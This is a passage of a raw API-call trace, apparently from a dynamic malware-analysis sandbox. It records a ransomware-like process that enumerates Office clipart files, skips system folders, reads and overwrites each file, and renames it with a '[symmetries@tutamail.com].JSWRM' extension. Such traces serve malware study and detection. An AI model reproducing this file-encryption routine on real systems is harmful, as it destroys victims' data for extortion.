lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdf0) returned 0x23fc98 [0082.388] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xdf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xdf0, lpOverlapped=0x0) returned 1 [0082.389] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.389] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xdf0, lpOverlapped=0x0) returned 1 [0082.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.390] CloseHandle (hObject=0x314) returned 1 [0082.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0082.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0082.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0082.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0082.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0082.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.390] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0082.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0082.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.391] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x258c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107468.WMF", cAlternateFileName="")) returned 1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2=".") returned 1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="..") returned 1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="...") returned 1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="windows") returned -1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="recovery") returned -1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="perflogs") returned -1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="documents and settings") returned 1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="system volume information") returned -1 [0082.391] lstrcmpiW (lpString1="J0107468.WMF", lpString2="msocache") returned -1 [0082.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0082.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107468.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107468.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107468.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0082.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107468.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107468.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107468.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0082.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.392] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9612) returned 1 [0082.392] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24d210 [0082.392] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2580, lpOverlapped=0x0) returned 1 [0082.394] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.394] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2580, lpOverlapped=0x0) returned 1 [0082.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.394] CloseHandle (hObject=0x314) returned 1 [0082.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0082.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0082.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0082.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0082.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0082.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0082.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.395] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0082.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0082.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.396] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107480.WMF", cAlternateFileName="")) returned 1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2=".") returned 1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="..") returned 1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="...") returned 1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="windows") returned -1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="recovery") returned -1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="perflogs") returned -1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="documents and settings") returned 1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="system volume information") returned -1 [0082.396] lstrcmpiW (lpString1="J0107480.WMF", lpString2="msocache") returned -1 [0082.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107480.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107480.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107480.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0082.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107480.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107480.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107480.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0082.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.397] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6024) returned 1 [0082.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1780) returned 0x205850 [0082.397] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1780, lpOverlapped=0x0) returned 1 [0082.399] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.399] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1780, lpOverlapped=0x0) returned 1 [0082.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.399] CloseHandle (hObject=0x314) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0082.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0082.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0082.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0082.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.399] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0082.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.400] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe736331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1374, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107482.WMF", cAlternateFileName="")) returned 1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2=".") returned 1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="..") returned 1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="...") returned 1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="windows") returned -1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="recovery") returned -1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="perflogs") returned -1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="documents and settings") returned 1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="system volume information") returned -1 [0082.400] lstrcmpiW (lpString1="J0107482.WMF", lpString2="msocache") returned -1 [0082.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107482.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107482.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107482.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0082.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107482.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107482.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107482.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0082.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.402] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4980) returned 1 [0082.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1370) returned 0x205850 [0082.402] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1370, lpOverlapped=0x0) returned 1 [0082.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.404] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1370, lpOverlapped=0x0) returned 1 [0082.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.404] CloseHandle (hObject=0x314) returned 1 [0082.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0082.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 